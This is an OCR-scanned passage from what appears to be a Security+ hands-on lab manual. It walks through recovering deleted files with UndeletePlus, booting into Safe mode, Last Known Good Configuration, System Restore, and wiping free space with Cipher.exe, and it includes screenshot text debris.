=l Uer Hies (2180 319dd94d05d373%ec. ., Very Good 492 Kb 2011+
%] PHG Graphics (3) B 350be0a47Th1feSS, . WeryGood  Ze4kb 20114
Text Documents (3) 37a2co0517836dcle. . wWindowsiSoftwareDistrib,,,  Wery Good 287 Kb 2011-0
[5] ¥ML Documents (24) |EER] |FJarsad775ac177d115...  CiiwindawsiSaftwareDistrib...  Wery Good 737 kb 2011+
) l:l Gfadfe?f117c73601,., whindows) SoftwareDistrib. wery Good  ZSE Kb 20110
£ 2P compression (1) 47506076209F386F 80 .. Criwindows\SoftwareDistrib,,,  Very Good 45 kb 2011+
El 4c96c3b0530F01 0ea2, . Windows) SoftwareDistrib...  Very Good 1.96 Mb 2011-1
[P=] | Cl4cderrensfaadetzdz... C:iuindows|SoftwareDistrib...  very Good 43,00 Mb 2011+
l:l S079dfb304d469ddrz, .. Ciwindows)SoftwareDistrib,.,  Very Good 913 Mb 2011-1
51e26582582976FdaF wWindowsiSoftwareDistrib,,,  Wery Good 2,85 Mb 2011-0
El [ |57br6d073hbe 7573, . ‘Windows)SoftwareDistrib...  Very Good 233 Kb 2011+
E 62cd4d950 300373925, windowsiSoftwareDistrib,..  vWery Good 223 Kb 2011-(
790b398F01af163d99, . wWindowsiSoftwareDistrib,,,  Wery Good 288 Kb 2011-0
88161F3452b00e8d0. .. WindowsiSoftwareDistrib...  Wery Good 562 Kb 2011-1
l:l a7350fb31263fe0066, windows) SoftwareDistrib,..  Wery Good  1.08Mb 2011+
[ |[Clacafosadsoracdfae. . Ciivindows\SoftwareDistrip..,  very Good 241 kKb 2011+
El | IAEINY_PREVIOUS xml  CiiiindowsiAppCompatiPro,,,  Wery Good 14kKb 20110 7
< G
Iil [ keep Folder structure Total Fil
Types l:l Undelete selected files) to: |C:\AA Jl Open ...
Folders
Drives Preview is not available for this type of file
Version: 2.9.7.0__|Filter OFF [Files: 2262 L | )

9 A o )

ella]o |

Minimize UndeletePlus.

6:28 PM
2/14/2011
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10. Launch Windows Explorer and expand the folders to the C:\AA folder.

—

s
==
Recycle Bin

®v| v Computer » Lacal Disk {T:) » AA

Organize + E Open - Share with » Print Burn New folder

0

S Favarites * MName Date modifiec Type Size
B Desktop | _ SRTZVOIT 2/14/2011 6:30 P Text Document 1 KBl
& Downloads

"] Recent Places

- Libraries
@ Dacuments
Jl Fusic
[E=] Pictures
I Videas

m

L Computer

£, Local Disk (€
Ab
J Perflags
J Program Files
J Program Files (
) Users

, Windows

[ il el g ey

€ Metwark Xz

E‘! $RTZVOIT Date modified: 2/14/2011 6:30 PM Date created: 2/14/2011 6:30 PM
| Text Document Size: 57 bytes

@ z]o[&] SEEIn

11. Double-click the file you recovered. The file should contain the information you

entered previously in New Text Document.txt.
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If the file does not contain your target copy, review the recoverable files in

TE the UndeletePlus utility and recover any other TXT files that were created
at approximately the time you created New Text Document.txt. If your
content is not recoverable, the system may have overwritten your content
between the time you deleted the file and the time you recovered the file.
You can repeat the file-creation steps and the file-deletion steps, including
emptying the Recycle Bin, and then repeat the scanning and recovery
using UndeletePlus.

'y
La
=
Recycle Bin

J b Computer v Local Disk (] » AA

Organize ~ j Open = Share with = Print Burn Mew folder > 0 @ J
S Favorites * Mame Date maodified Type Size
B Desktap | SRTZVOIT 2/14/201L 6:36 PM Text Document LEB

4 Dawnloads

Y
1=l Recent Places

s Libraries | $RTZV3T - Notepad E@g‘
@ Dacuments File Edit Format View Help
@ Music ¥ou've got to ask yourself one guestion: Do I feel Tucky? -
[ Pictures |
£ videos =

18 Computer
£ Local Disk (€}
L AA
. Perflogs
. Pragram Files
. Pragram Files {
i
i

o Users

; Windows B | I
€ Metwark >
= $RTZVA3T Date modified: 2/14/2011 6:36 PM Date created: 2/14/2011 6:36 PM
Text Document Size: 58 bytes

[Version: 2970 TRilter OFF [Files: 2259 Y | 50|
A

ellilo|&|a] NTRIET

12. Close Notepad and close Windows Explorer.
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13. In the UndeletePlus utility, notice the file type filters in the left pane labeled Types.
Click on several to see the types of files that may be recoverable on your system.

"
"3
=
Recycle Bin
§4 Undelete PLUS - Main = | =]
| Start Scan " Start Undelete ” Filter || Update ” Help check for Driver |
Lng] Files |
=T My Computer Filename |Path | Statu |5ize: |Date Cre
i | Application (L) ;vista_subbanner-part‘.. CiiUsers\BulliAppDatallocaly...  Wery Good 4 kb 1601-01-
i | |vista_subbanner-cen... CiiUsersiBuliappDatallocah...  Wery Good 151 b 1601-01-
ablnet comprea\on @3 \__|vista_mu_subbanner-... CiiUsersiBuliAppDatallocall... Wery Good  SKb 1601-01-
a = GIF graphics (14) [shield[1].gif C:\UsersiBullippDatalLocall... Very Good  1Kb 1601-01-
é HTML Documents (43 | |button_Instal_disabl... CriUsersiBuliAppDatallocall... Wery Good  1kb 1601-01-
18] G Standard Graphics () orer Inalt]gf O sl apebotalocdl . Ve Gond 20 160101
; utton_Install[1].gif HUsers\BullAppDatallocal...  Yery Goo -01-|
Other FI\E!S. 2177 [ |button_Install_hewver... CiiUsers\BuliAppDatallocall... Wery Good — Zkb 1601-01-
['ﬂ PNG Graphics (3) [ |button_Install_clicked.,. C:\Users\BulllappDatallocall,., very Good  ZKb 1601-01-
Text Documents (3) \__|button_Install_disabl... CiiUsersiBuliappDatallocah...  Very Good 1kb 1601-01-
[ |select_wowin?[1].0f  CiUsers\BullAppDatallocall... Wery Good  10kh 1601-01-
ML DUEumer?tS i) | |select_all_programs...  CriUsersiBuliAppDatallocall... Wery Good  9kb 1601-01-
I:E ZIF compression (1) " |pieel[1].af CiiUsersiBullfppDatallocall,., Wery Good  42b 1601-01-
| |mtclogDatal 1], gif CiUsersiBullAppDatallocal,...  Very Good  48b 1601-01-
| m F
[ keep Folder structure Total Fil
Types Undelete selected Filegs) ta: Jl Open ...
Folders
Files with potentially recoverable content: 2259
. Start undelete
Drives Undeleted successfully: CAVRY2ZU7DA, bt
End undzlete
Version: 2.9.7.0__|Filter OFF [Filles: 2259 L | )

6:46 PM
2/14/2011

w8 )

el Z]olex

14. Click the Filter button at the top of the application. This dialog box allows
you to specify additional criteria to help you locate target deleted content for
recovery. You enter the search criteria and click the Set Filter button. Then you click
the Start Scan button again. The search shows only recoverable files that match the
filter criteria.
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n

i

T
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i | application (1) viska_subbanner-part, ., CiiUsers\BullAppDatalLocah,., Wery Good 4 kb 1601-01-

e i El [Cvista_subbar — -
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15. Feel free to recover other deleted content.

Criteria for Completion

You have completed this task when you have successfully recovered deleted content using
the UndeletePlus recovery utility.
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Earlier in this book, we mentioned three main facets of your
information assets that you, as the security professional, are
required to protect:

= Itis your job to protect the confidentiality of the organization’s information assets—
that is, to keep the company’s secrets secret.

= Itis your job to protect the integrity of the organization’s information assets—that is, to
protect the information from being tampered with. No one is allowed to “cook the books.”

= Itis your job to protect the availability of the organization’s information assets.
If users cannot access the valuable information assets when they are needed, the
information has lost its value, and the users lose productivity.

Security troubleshooting is largely about disaster recovery, which is a subset of
protecting the availability of the information assets. If the server fails due to a bad driver
or Registry modification, the resources that the server provides to users are no longer
available. You must quickly return the system to a stable state and allow users to regain
access to the resources that the server had been providing.

To address the need for recovery, you will look in this phase at Safe mode, which loads
a minimum of drivers in an attempt to provide recovery after a faulty driver has been
installed. Then you will look at Last Known Good Configuration (LKGC), which replaces
the current Registry with a previously “known good” Registry. And finally, youw’ll perform
an Automated System Recovery (ASR) backup and then an ASR restore. An ASR restores
the operating system, Registry, and drivers but does not protect data. You must use a
backup utility to provide disaster recovery for your data.

Another task for the security professional is related to magnetic-media reuse. This task
involves installing a hard drive in a system that had previously been installed in a different
system.

As the security professional, you must protect the confidentiality of the data previously
written on the disk. Data can be recovered from the free space on a disk after the file has
been deleted and the Recycle Bin has been emptied. Data can even be recovered off a disk
after re-partitioning and reformatting.

Finally, you will download and install a host-based intrusion detection and protection
system to monitor the system for malware, malicious behavior, and attempted malicious
access to your computer system from the network.

The tasks in this phase map to Domains 1, 2, and 4 in the objectives for the
TE CompTIA Security+ exam (www.comptia.org/certifications/listed/

security.aspx).
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Task 10.1: Booting into Safe Mode

Have you ever replaced a device or installed new drivers, and after rebooting the system
gotten nothing but a black screen, or even worse, the dreaded blue screen? Safe mode was
designed to help you resolve just this type of problem.

Safe mode boots into the operating system while loading only the bare minimum of
drivers—like the low-level VGA video driver—hoping to avoid initializing the bad driver
that is causing the system to fail on reboot. While in Safe mode, you can (you hope!) figure
out where the problem is coming from and find a resolution. Then you can reboot into
Normal mode, which initializes all drivers configured.

Safe mode cannot be used to resolve all problems. Although it minimizes the number of
drivers it loads, it must still load some drivers. For example, Safe mode must load drivers
for mass storage devices, like controller cards, tape drives, and optical drives. These are
loaded because these storage devices might be required to access disaster recovery media
to help with the repair. If the cause of the failure involved one of these device drivers, Safe
mode will also fail on bootup.

Further, while in Safe mode, since many drivers are not loaded, many devices are
unavailable. You will have limited access to system resources, since many of their drivers
were not initialized.

Scenario

You are an administrator in an Active Directory environment. After installing a new set of
drivers for an existing device, a system that you are responsible for is blue-screening
on reboot.

Scope of Task

Duration
This task should take 20 minutes.

Setup

You will reboot into Safe mode and initialize a driver update, as if there had been a system
failure.

Caveat

Safe mode does not initialize all system devices. Safe mode does initialize all mass storage
device drivers in case you need to perform a restore from one or more backup devices. Since
there has been no actual device failure, do not complete any driver updates or other system
changes.



520 Phase 10 = Security Troubleshooting

Procedure

For this task, you will boot into Safe mode and implement a device driver update
procedure, but you will not complete the update.

@:" Since there is no actual driver failure, do not replace any drivers.
ING

You will cancel out of the driver update process before making any system changes.

Equipment Used
For this task, you must have:
= Windows XP Professional system

= Administrator access

Details

1. Power up the system. Immediately after the BOIS screen clears, press the F8 function
key repeatedly until you are presented with the Windows Advanced Options Menu.

Hindows Advanced Options Menu
Please select an option:

Safe Mode
Safe Mode with Networking
Safe Mode with Command Prompt

Enable Boot Logging

Enable UGA HMode

Last Enown Good Configuration (your most recent settings that worked)
Directory Services Restore Mode (Hindows doMain controllers only)
Debugging Mode

Start Windows Normally

lUse the up and down arrow keys to move the highlight to your choice.

If you see the color Windows startup screen with the progress bar sliding
TE from left to right, you've missed the time slot for entering the Windows

Advanced Options Menu. Reboot the system and try again.
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Select Safe Mode from the Windows Advanced Options Menu.

Log on to the Windows XP Professional system as the Administrator.

You will be presented with a message identifying Safe Mode operation. Review the

message and click Yes to proceed into Safe mode.

AN

Windows is running in safe mode.

This special diagnostic mode of Windows enables you to fix a problem which may be

caused by your network or hardware settings, Make sure these settings are correct in
Control Panel, and then try starting Windows again. While in safe mode, some of your
devices may not be available,

To proceed bo wark in safe mode, click Yes. IF you prefer to use System Restore ko
restore your computer to a previous state, click Ma,

You will see a black desktop with Safe mode clearly labeled in the four corners of

the desktop.

Right-click on My Computer and select Manage (or select Start » Programs »
Administrative Tools » Computer Management). In the Computer Management

es Mo |

console, select Device Manager.

In the right pane, expand Network Adapters. Click on the first adapter listed.

Right-click on the first adapter and select Update Driver.

O Computer Management

Action  View

Window  Help

BEIE
JRETET

FS 2 a=na

Computer Management {Local)
- System Tools
- {{] Event: Viewer

Shared Folders
% Local Users and Groups
. y Device Manager
- @ Storage
Removable Storage
Disk Defragmenter
Disk Management
& Services and Applications

|

Performance Logs and Alerts

[+]-84, Batteries

- I Computer

[+-2g Disk drives

I:I---§ Display adapters
(¥4 DYDJCD-ROM drives
[+]-i= Floppy disk controllers
[:I---& Floppy disk. drives
[+-{=% IDE ATAJATAPT controllers

[ Kevboards

[ ’:) Mice and other pointing devices

[=- BB} Metwark adapters

S AMD PCMET Family PCI Ethernet Adapter

s

HS AMD PCMET Family PCI Ethernet Adapte
H Direct Parallel

HE WAN Miniport (IF)

HE WAN Miniport (IP) - Packet Scheduler Mi
HB WAN Miniport (L2TP)

. EE) WAN Miniport (PPPOE)

Update Driver. ..
Disable
Urinstall

Scan For hardware changes

Properties

. EE WAN Miriport (PPTF)

R [P p—

=

521

This should start the Hardware Update Wizard. Select Install From A List Or Specific
Location (Advanced), and click Next.
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10. On the next screen, select “Don’t Search. I Will Choose The Driver To Install.” and
then click Next.

Hardware Update Wizard

Please choose your search and installation options. .

" Search for the best diiver in these locations.

Use the check boxes below ta limit or expand the default search, which includes local
pathe and removable media. The best driver found will be installed.

I™ Search removable media (foppy, CO-ROHM...)

I Include this location in the search:

|D'\ LI Erowse |

@ Don't search. | will choose the driver to install

Choose thiz option to select the device diver from a list. \Windows does not guarantee that
the driver pou chooze will be the best match for pour hardware.,

< Back I Next > I Cancel |

11. On the next screen, click Have Disk as if you were going to restore from the earlier set
of driver installation disks, or point to where the earlier drivers resided on the system.

Hardware Update Wizard

Select Network Adapter
‘w/hich network, adapter do you want to install?

Click the Metwork Adapter that matches your hardware, then click DK, If you have an
installation disk for this companent, click Have Disk.

¥ Show compatible hardware

Nehwork Adapter.
= AMD PCNET Family PCI Ethernet Adapler

@’ Thiz driver is digitally sighed. Have Disk. .. |

Tell me why driver sigring is important

< Back I Mext > I Cancel |

12. In the Install From Disk dialog box, browse to the earlier driver files and proceed with
the driver update procedure.

7/
ING

Since there is no actual driver failure, do not replace any drivers.

13. Click Cancel to close the Install From Disk dialog box.
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14. Click Cancel to close the Hardware Update Wizard.
15. Shut down the XP Professional system.

Criteria for Completion

You have completed this task when you have booted into Safe mode and initialized a driver
replacement procedure. You should not have completed the driver update, since there really
was no driver failure.

Task 10.2: Implementing Last Known
Good Configuration

Last Known Good Configuration (LKGC) is a bootup option from the Windows Advanced
Options Menu. It rolls back the current Registry settings to the state of the Registry at the
last successful logon. That successful logon represented a “known good” Registry. If

the system booted and the logon service was functional enough to authenticate you, the
configuration being used by the Registry must have been good. The LKGC has been a
feature of Windows beginning with Windows NT and remains useful through Windows 7
and Windows Server 2008 R2.

There are times when the LKGC will correct the problem, and there are times when
it will not. The LKGC only restores the Registry to its earlier state. It does not make any
changes to the file system, other than those related to the Registry files. It does not restore
deleted or overwritten files.

If you had been mucking about in Regedit and lost track of what you were doing, or
you’ve just changed your mind on some changes to the Registry, simply reboot the system
into LKGC to undo your changes.

Another example of where LKGC cannot help is if you have updated and overwritten
driver files with the same name and path. LKGC will not correct a problem with these driver
files. The Registry is calling the same driver filenames, and you’ve replaced those files with

bad driver files.

Scenario

You are an administrator in an Active Directory environment. After making a system
modification (in the Registry), you change your mind and wish to revert back to the earlier
configuration.

Scope of Task

Duration
This task should take 15 minutes.
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Setup

You will make changes to a system configuration and then reboot into LKGC to restore the
system to its earlier configuration.

Caveat

A configuration is declared “known good” upon successful logon. At that point, the earlier
“known good” Registry is discarded, and this current configuration is copied into the last
known good slot.

If you have made changes and logged on to the system, LKGC now holds your current
configuration as known good, and cannot return your system to the earlier state.

Procedure

You will configure your system with a desktop background. Then you will reboot and
observe that your new background has become the current configuration. You will then
change the desktop to a different background.

Then you will reboot into LKGC and observe that your desktop has reverted back to the
original background.

Equipment Used
For this task, you must have:
= Windows XP Professional system

= Administrator access

Details

Setting the Desktop: A “Known Good” Configuration

1. Log on to the Windows XP Professional system as the Administrator.
2. Right-click on the desktop and select Properties.

Arrange Icons By »
Refresh

Paste
Paste Shortcut
Undo Copy Ctri+2

New »

Praperties

3. In the Desktop Properties dialog box, select Radiance as the desktop background.
(This is also referred to as the desktop wallpaper.) Click OK to set the background.
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Display Properties 2|

Themes Desktop |Screem Saverl Appaalamce' Settings: I

B ackground:

= Browse... |
Poaitian:
@ Fhododendran IStlelch -
BT Ripple o
@ River Sumida (Cafles
T = —
Cugtomize Desktop.. |
ok I Cancel | Apply |
This change of background was recorded in the Registry. This change is
TE representative of any other configuration change that affects the Registry.

This could have been a manual edit of the Registry, the installation of an
application or drivers for a hardware device, or some other configuration
change that gets written to the Registry.

4. Reboot the computer.

Booting into a Known Good Configuration

1. Log on to the Windows XP Professional system as the Administrator.

)’ This successful logon copies this current configuration in the Registry,
‘d'rs with Radiance as the desktop, into the LKGC in the Registry.

Confirm that Radiance is the desktop background.
Right-click on the desktop and select Properties.

In the Desktop Properties dialog box, select Red Moon Desert as the desktop
background. Click OK to set the background.

% This modifies the current configuration (only) in the Registry.
TE

5. Shut down the computer.
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Booting into Last Known Good Configuration

1. Power up the system. Immediately after the BIOS screen clears, press the F8 function
key (repeatedly if necessary) until you are presented with the Windows Advanced
Options Menu.

If you see the color Windows startup screen with the progress bar sliding
JTE from left to right, you’'ve missed the time slot for entering the Windows
Advanced Options Menu. Reboot the system and try again.

2. Select Last Known Good Configuration from the Windows Advanced Options Menu.
Allow the system to boot to the Windows Security GINA (Graphical Identification
aNd Authentication) screen.

3. Log on to the Windows XP Professional system as the Administrator.

Your desktop should have reverted back to Radiance as the desktop

JTE background from the LKGC. When you chose Last Known Good
Configuration from the Windows Advanced Options Menu, the current
configuration in the Registry, which contained Red Moon Desert as the
desktop background, was discarded and the LKGC, which contained
Radiance as the desktop background, was copied into the current
configuration.

Criteria for Completion

You have completed this task when you have booted into Last Known Good Configuration
and recovered your previous desktop settings.

Task 10.3: Using System Restore

System Restore is a great feature in Windows XP, Windows Vista, and Windows 7. It
automatically records the state of the operating system, called a restore point, just prior
to the installation of drivers and patches and just prior to a restore from backup, and it
also generates a daily restore point, just for good measure. If third-party applications

are compliant with the restore point AP, the installation of these will also trigger the
automatic creation of a restore point. These restore points can also be manually triggered
if you know that you’re about to do something a little dangerous.
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The restore point records the Registry, local profiles, COM+ database, Windows
protected files, Windows Management Instrumentation (WMI) database, the Internet
Information Services (IIS) metabase, and files with the following extensions: .CAT, .COM,
.DLL, .EXE, .INF, .MSI, .OLE, and .SYS.

System Restore consumes a minimum of 200 MB on the hard drive. The system keeps
track of your restore points and allows you to roll back to an earlier system configuration.

System Restore can be added to a Windows Server 2003 system, but it is not supported
by Microsoft. You can access the instructions and installation files at www.msfn.org/
win2k3/sysrestore.htm. However, use this unsupported add-on at your own risk.

Scenario

You installed a new application, and later decide that you do not want the application
installed. You know that the uninstall routine has some problems and you need to return the
system to its previous state.

Scope of Task

Duration
This task should take 30 minutes.

Setup

You will need to download Adminpak.msi from the Microsoft website, from a Server
2003 installation CD in the \1386 folder, or from an installed Server 2003 system in the
\Windows\System32 folder.

If you have already installed Adminpak.msi on your system, you can install any other
new application on the system. System Restore will remove the configuration settings for the
application; however, the application files may remain on your hard drive. The application
will probably not operate correctly, and will need to be reinstalled after Task 10.3 is
completed to operate the application correctly after restoring the system to its previous state.

Caveat

Any time you are manipulating critical system files, risk is involved. You should always
make backups of all your data and your system configuration.

System Restore does not record data files. You must implement a standard backup
routine to maintain fault tolerance for your data.

Procedure

You will perform a manual system restore point and then install a new application on the
system. You will then perform a system restore to roll the system back to its state prior to
the application installation.
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Equipment Used

For this task, you must have:

= Windows XP Professional system
= Administrator access

= Adminpak.msi (See “Setup” to learn where to locate Adminpak.msi.)

Details
Confirming System Restore and Creating a Manual Restore Point
1. Log on to the Windows XP Professional system as the Administrator.

2. Right-click on My Computer and select Properties. Select the System Restore tab.

System Properties

General Computer Mame ” Hardware ” Advanced |

System Restore | Automatic Updates | Remote

<11 System Restore can track and reverse hammful changes to your

t@ computer.

[ Tum off System Restore

Disk space uzage

tave the slider to the right to increase or to the left to decrease the
amourt of disk space for System Restore, Decreasing the disk space
may reduce the number of available restore points.

Disk space to use:

Min . J Max

12% (450 ME)

Status
= [C) Monitoring

bovh

Confirm that System Restore is turned on (the check box Turn Off System Restore is
cleared), and maximize the disk space usage.

Close System Properties.

From the Start button, select Programs » Administrative Tools and observe the
collection of default, installed administrative tools.

5. From the Start button, select Programs » Accessories » System Tools » System
Restore.

6. In the System Restore Wizard, select Create A Restore Point. Click Next.
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System Restore

Welcome to System Restore

‘ou can use System Restore ko undo harmful changes ta
wour computer and restore its settings and performance,
System Restore returns your computer to an earlisr time
(called a restore point) withaut causing you ta lose recent
work, such as saved documents, e-mail, or history and
Favarites lists.

Aty changes that System Restore makes ta your computer
are completely reversible,

Your computer automatically creates restore points fcalled
system checkpoints), but you can also use System Restore
b cheate yaur awn restore points, This is ussful if yau ars
abaut to make a major change to your system, such as
installing & new pragram or changing your registry,

Swstem Restare Settings

To continue, select an option, and then click Next,
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To begin, select the task that you want to perform:

O Restore my computer ko an earlier ime

(®) Create arestore point

Cancel

System Restore

Create a Restore Point

Your computer automatically creates restore points at regularly scheduled times or before certain programs are
installed. Howeer, you can use Systkem Reskore to create your own restore points at kimes other than those

scheduled by your camputer,

Type a description for your restore point in the following text hox. Ensure that you choose a description that is
easy to identify in case you need ka restore your computer later,

Restore point description:

On the next screen, type a name for your restore point (in this example, we used
Admin Pack Install). Click Next.

Admin Pack Install

The current date and time are automatically added to your restore point.

This restore point cannot be changed after it is created. Before continuing, ensure that you have

typed the correct name.

k < Bark i Create Cancel

8. The system will be busy for a few moments and then should present confirmation that

a restore point has been created. Click Close to close the System Restore Wizard.
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£ system Restore

Restore Point Created

New restore point:

Tuesday, October 03, 2006
11:02:48 AM Admin Pack Install

To perform another kask, click Home,

Installing a New Application

1. On the Windows XP Professional system, acquire Adminpak.msi from the Microsoft
website, from a Server 2003 installation CD in the \1i386 folder, or from an installed
Server 2003 system in the \Windows\System32 folder.

If you have downloaded the Adminpak.exe file from the Microsoft website,
TE it must be extracted to gain access to the Adminpak.msi file. Extract

Adminpak.exe into a new folder on your desktop.

2. Double-click on Adminpak.msi to launch the installation application. Click Next in the
Administration Tools Setup Wizard.

3. Click the I Agree button on the EULA. Click Next.
You should see the Installation Progress dialog box.
Click Finish to close the Administration Tools Setup Wizard.

From the Start button, select Programs » Administrative Tools and observe the
collection of newly installed administrative tools.
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@ Games
@ Startup

wd Wsn Explorer
@ Set Program Access and Defauls

W Windows Catalog
& windows Update

@ windows Suppart Tools
@ Trkernet Explorer

@ Outlook Express

o Remote Assistance
@& windows Media Player
4§ windows Messenger

Active Directory Domains and Trusts
Active Directory Management

Active Directory Sites and Services
Active Directory Users and Computers
Autharization Manager

Certification Autharity

Cluster Administratar

Component Services

Computer Management

Connection Manager Administration Kit
Data Sources (ODEC)

DHCP

Distributed File System

DNS

Event Viewer

IP Address Management

Local Security Policy

Network Load Balancing Manager
Performance

Public key Management

[ Documents r
@ settings r
) search r
@) Help and Support

& Run..

4] Log Off Administrator...
[B shut Down...

Performing a System Restore

1.
2.

: System Restore

Welcome to System Restore

‘au can use System Restore ko undo harmful changes to
your computer and restare its settings and performance.
System Restore returns your computer ko an earlier kime
(called 5 restore point) withaut causing you to lose recent
work, such as saved documents, e-mail, or history and
Favorites lists,

Any changes that System Restore makes ko your computer
are completely reversible,

Yaur computer automatically creates restore points fcalled
system checkpoints), but you can also use System Restore
to create yaur own restors points. This is ussful iF yau ars
about ta make a major change to vour system, such as
instaling & new program or changing your registry.

System Restore Settings

T continue, select an option, and then dick Mext,

Remate Desktops

Remote Storage

Services

Telephony

Terminal Server Licensing
Terminal Services Manager
UDDI Services

BEFTLFeRIBAYIAErBdaR@aTRIAR NS

wWindows Server 2003 Administration Tools Pack Help

[® Untitled - M @ WINS

Select the Restore My Computer To An Earlier Time option. Click Next.

To begin, select the task that you want to perform:

(@ Heskare my compLter fo.an sarier ime

Ocrgate a restore poink

CUndo my last restaration

531

From the Start button, select Programs » Accessories » System Tools » System Restore.
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You should see your manually triggered restore point on the list of restore points for
today. You will notice that the installation of Adminpak.msi triggered an automatic
restore point. Select either one of these restore points, since they both contain the
same system state. Click Next.

L Systemn Restore

Select a Restore Point

The following calendar displays in bold all of the dates that have restore points available, The list displays the
restare paints that are available far the selecked date,

Possible kypes of restore points ate: system checkpoints (scheduled restore poinks created by your computer),
manual restore points (restore paints created by you), and installation restore paints (aukomatic restore paints
created when certain programs are installed).

1. On this calendar, click a bold date. 2. On this list, click a restore point.

E October, 2006 =

Sun |Mon | Tue |Wed| Thu | Fri | Sat
24| 25| 26| 27| za| 23] a0 A1 Admin Pack Install
1 2 4 ) [ 7

g ) o] 11 12] 13 14|
15| 16| i¥] 18| 13| 20[ 21
22| 23| 24| 5] =e| 27| 2§
23| 30| 31 1 2 3 4

[ <Back | [ mext> ][ cancel |

Review the details of the configured system restore. Once you have done so, click Next.

b5 System Restore

Confirm Restore Point Selection

Selected restore point:

Tuesday, Dctober 03, 2006
11:07 &AM Installed Windows Server 2003 Administration Tools Pack

This process does nok cause you to lose recent wark, such as saved documents or e-mail, and is complekely
reversible,

During the restoration, System Restaore shuts down Windows. After the restoration is complete, Windows
restarts using the settings From the date and time listed abowe.

Important: Before continuing, save your changes and close any open programs.

System Restore may take a moment to collect information about the selected restore point before shutting
down your computer,

To restare your computer to this date and time, click Mext, < Back E Mext = i Cancel
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L The restore procedure will reboot your system. Save all of your open files
ING and close all other applications.
5. The system will log you off and then perform the configured restore. The system will
then automatically reboot.

6. Log on to the Windows XP Professional system as the Administrator. You will be presented
with a notification of the successful completion of the system restore process. Click OK.

7. Confirm that the application is no longer installed. From the Start button, select
Programs » Administrative Tools and observe the collection of original, default,
installed administrative tools with the supplemental Admin Pack tools removed.

)’ If desired, you can undo the system restore by selecting Start > Programs »
A TE Accessories » System Tools » System Restore and selecting to undo the
last restoration.

Performing a System Restore from Safe Mode

System restore can be initiated while in Safe mode. This would be beneficial if your system
were failing to boot up properly after the installation of some new application or driver set.

1. Power up the system. Immediately after the BIOS screen clears, press the F8 function
key repeatedly until you are presented with the Windows Advanced Options Menu.

If you see the color Windows startup screen with the progress bar sliding
TE from left to right, you’'ve missed the time slot for entering the Windows

Advanced Options Menu. Reboot the system and try again.

Select Safe Mode from the Windows Advanced Options Menu.
Log on to the Windows XP Professional system as the Administrator.

You will be presented with a message identifying Safe mode operation. Review the
message and click No to proceed into System Restore.

1 Windows is running in safe mode,
L3

This special diagnostic mode of Windows enables you ta fix a problem which may be
caused by your network or hardware settings, Make sure these settings are correct in
Control Panel, and then try starting \Windows again. While in safe mode, same of your
devices may not be available.

To praceed bo wark in safe mode, click Yes. IF you prefer to use System Restore to
restore your computer to a previous state, click Mo,

fes o |
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Criteria for Completion

You have completed this task when you have restored the system to a previous system
restore point.

Task 10.4: Sanitizing Media

This task deals with discarding or reusing media, like paper documents, CDs, DVDs, old tapes
from backup systems, and hard drives. Discarding or reusing this media is a potential security
breach, unless the media has been successfully and completely purged of recoverable data.

There are times when you don’t want to purge all data on a disk but just the deleted
files. When you delete a file off your computer, the file system doesn’t actually remove the
file from the disk. In the table of contents for the partition, it simply overwrites the first
character of the filename with a question mark. This tells the file system that the space
previously occupied by the file is now free space. The actual file content remains on the disk
itself and can be recovered—by a good guy or by a bad guy—with digital forensic tools.

The National Institute of Standards and Technology’s Special Publication 800-88
Guidelines for Media Sanitation (February 2006) recommends sanitizing magnetic media
by physical destruction; by magnetic degaussing, which requires a special magnetic
chamber; or by using a software tool called Secure Erase (hdderase.exe), a free download
from the University of California—San Diego (UCSD) at http://cmrr.ucsd.edu/people/
Hughes/SecureErase.shtml.

/4 The Secure Erase tool (hdderase.exe) will destroy all data and all partitions
ING on the entire disk!

Many software tools are available to guard against anyone being able to recover your

deleted files. You can also use a free tool provided by Microsoft, called Cipher.exe, which

can be used to overwrite the free space on a partition to accomplish this task.

L Using this tool on your partition will also mean you may not be able to
ING recover your own files that you’ve perhaps inadvertently deleted.
Scenario

You want to ensure that all files that you’ve deleted are rendered unrecoverable. You do not
wish to destroy all data on the disk, but just to protect the deleted files from being recovered.
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Scope of Task

Duration

This task should take about 25 minutes to initiate. The completion of the disk-wiping
process may vary, depending on the amount of free space on the partition being wiped and
other factors.

Setup

Cipher.exe is built into Microsoft Windows 2000 and later Microsoft operating systems.

Caveat

These tools are destructive and render deleted files intentionally unrecoverable. Be sure you
have copies of any files you do not intend to lose.

Cipher.exe is nondestructive and only overwrites free space (that is, the space in clusters
that is marked as free in the partition’s table of contents). Cipher.exe does not overwrite
slack space. Slack space is the unused space in the last cluster of each file. Forensic tools can
recover old data from slack space.

Procedure

You will calculate the amount of free space and slack space on your drive. You will then
use Cipher.exe to wipe all free space on your partition.

Equipment Used
For this task, you must have:
= Windows XP Professional system with an NTFS partition

= Administrator access

Details
Determining the Amount of Free Space and Slack Space
1. Log on to the Windows XP Professional system as the Administrator.

2. Open a command window. Select Start » Run, and then type CMD in the Open field.
Click OK.

In the command window, at the command prompt, type chkdsk /? and press Enter.

Review the help information for CheckDisk.

)’ If you add the /F switch that will attempt to fix detected errors on the disk,
A TE the system will need to be rebooted to complete the scan. The CheckDisk
scan will take several minutes to complete.
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5. At the command prompt type chkdsk c: /i to check the index entries on the C:\
partition only and press Enter.

C:\>chkdsk ¢: /i
The type of the file system is NTRS.

UARNINGt F parameter not specified.
Running CHEDSK in read-only mode.

UARNING! 1 parameter specified
Nour drive may still be corrupt even after running CHKDSK.

CHKDSX is verifying files (stage 1 of 3).
File verification completed.

CHDSK iz verifying indexes (stage 2 of 3.

[ndex verification complete

CHKDSK is verifying senurlty “descriptors (stage 3 of 3).
Security descriptor verification completed.

4184908 KB total disk space.
1613424 KB in 11853 files.
3056 HB in 867 indexes.
HB in bad sectors.
37628 KB in use by the system.
2297 XB occupied by the log file.
2530792 KB available on disk.

4096 hytes in_each allecation unit.
1846225 total allocation units on disk.
632698 allocation units availabhle on disk.

c:on

6. Notice the amount of space available on disk approximately 2.5 GB (2530792 KB) in
the graphic. This is the amount of free space. You will be wiping that space using the
Cipher.exe utility.

7. Notice the number of bytes in each allocation unit. An allocation unit is a cluster. In
the graphic, the cluster size is 4 KB (4096 bytes).

8. Minimize the command window.

9. Launch Windows Explorer by right-clicking on the Start button and selecting Explore.
10. In the left pane, select the Local Disk (C:).

11. In the right pane, right-click on the white space and choose Select All.

12. In the right pane, right-click on the selected files and folders and select Properties.

Folders X Mame = Size | Type Date Madified
@ Deskhop File: Folder 10f3/2006 11:05 AM
E] My Documents File Folder 92712006 2:59 PM
= 5) “P1 File: Folder 10f3/2006 11:08 AM
